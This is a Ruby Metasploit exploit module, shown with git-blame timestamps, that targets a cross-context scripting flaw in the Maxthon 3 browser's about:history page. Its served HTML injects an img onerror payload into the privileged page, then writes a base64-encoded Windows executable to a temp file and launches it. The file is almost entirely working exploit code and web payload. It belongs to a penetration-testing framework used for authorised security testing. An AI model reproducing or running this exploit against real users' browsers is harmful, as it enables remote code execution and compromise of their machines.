metasploit-framework/modules/exploits/windows/browser/maxthon_history_xcs.rb

142 lines
3.7 KiB
Ruby
Raw Normal View History

2012-12-07 17:27:09 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
2012-12-07 18:23:00 +00:00
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
2012-12-07 19:47:07 +00:00
'Name' => 'Maxthon3 about:history XCS Trusted Zone Code Execution',
'Description' => %q{
Cross Context Scripting (XCS) is possible in the Maxthon about:history page.
2012-12-07 17:27:09 +00:00
Injection in such privileged/trusted browser zone can be used to modify
configuration settings and execute arbitrary commands.
2012-12-07 19:47:07 +00:00
Please note this module only works against specific versions of XCS. Currently,
we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.
},
2012-12-07 19:47:07 +00:00
'License' => MSF_LICENSE,
'Author' =>
2012-12-07 19:38:08 +00:00
[
2012-12-07 17:27:09 +00:00
'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module
2012-12-07 19:38:08 +00:00
'sinn3r', # msf module
'juan vazquez' # msf module
2012-12-07 17:27:09 +00:00
],
'References' =>
[
2012-12-07 19:47:07 +00:00
['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html']
],
'Payload' =>
{
2012-12-07 19:47:07 +00:00
'DisableNops' => true
},
2012-12-07 17:27:09 +00:00
'Platform' => 'win',
'Targets' =>
[
2012-12-07 19:38:08 +00:00
['Maxthon 3 (prior to 3.3) on Windows', {} ]
],
'DisclosureDate' => 'Nov 26 2012',
2012-12-07 19:47:07 +00:00
'DefaultTarget' => 0
))
end
def on_request_uri(cli, request)
2012-12-07 19:38:08 +00:00
if request.headers['User-agent'] !~ /Maxthon\/3/ or request.headers['User-agent'] !~ /AppleWebKit\/534.12/
print_status("Sending 404 for User-Agent #{request.headers['User-agent']}")
2012-12-07 19:32:44 +00:00
send_not_found(cli)
2012-12-07 19:38:08 +00:00
return
2012-12-07 19:32:44 +00:00
end
2012-12-07 19:47:07 +00:00
html_hdr = %Q|
<html>
<head>
<title>Loading</title>
|
html_ftr = %Q|
</head>
<body >
<h1>Loading</h1>
</body></html>
|
case request.uri
2012-12-07 17:27:09 +00:00
when /\?jspayload/
p = regenerate_payload(cli)
if (p.nil?)
send_not_found(cli)
return
end
# We're going to run this through unescape(), so make sure
# everything is encoded
2012-12-07 18:23:00 +00:00
penc = generate_payload_exe
penc2 = Rex::Text.encode_base64(penc)
2012-12-07 17:27:09 +00:00
2012-12-07 18:23:00 +00:00
# now this is base64 encoded payload which needs to be passed to the file write api in maxthon.
# Then file can be launched via Program DOM API, because of this only Maxthon 3.1 versions are targeted.
# The Program DOM API isn't available on Maxthon 3.2 and upper versions.
2012-12-07 19:38:08 +00:00
content = %Q|
if(maxthon.program)
{
var fileTemp = new maxthon.io.File.createTempFile("test","exe");
var fileObj = maxthon.io.File(fileTemp);
maxthon.io.FileWriter(fileTemp);
maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
maxthon.program.Program.launch(fileTemp.name_,"C:");
}
2012-12-07 19:38:08 +00:00
|
2012-12-07 17:27:09 +00:00
when /\?history/
js = %Q|
window.onload = function() {
location.href = "about:history";
}
2012-12-07 17:27:09 +00:00
|
2012-12-07 19:47:07 +00:00
2012-12-07 17:27:09 +00:00
content = %Q|
#{html_hdr}
<script>
#{js}
</script>
#{html_ftr}
2012-12-07 17:27:09 +00:00
|
2012-12-07 19:47:07 +00:00
when get_resource()
print_status("Sending #{self.name} payload for request #{request.uri}")
2012-12-07 17:27:09 +00:00
js = %Q|
url = location.href;
url2 = url + "?jspayload=1";
inj = "?history#%22/><img src=a onerror=%22"
inj_1 = "a=document.createElement('script');a.setAttribute('src','"+url2+"');document.body.appendChild(a);";
window.location = unescape(inj) + inj_1;
2012-12-07 17:27:09 +00:00
|
2012-12-07 17:27:09 +00:00
content = %Q|
#{html_hdr}
<script>
#{js}
</script>
#{html_ftr}
2012-12-07 17:27:09 +00:00
|
else
print_status("Sending 404 for request #{request.uri}")
send_not_found(cli)
return
end
2012-12-07 18:23:00 +00:00
send_response_html(cli, content)
end
end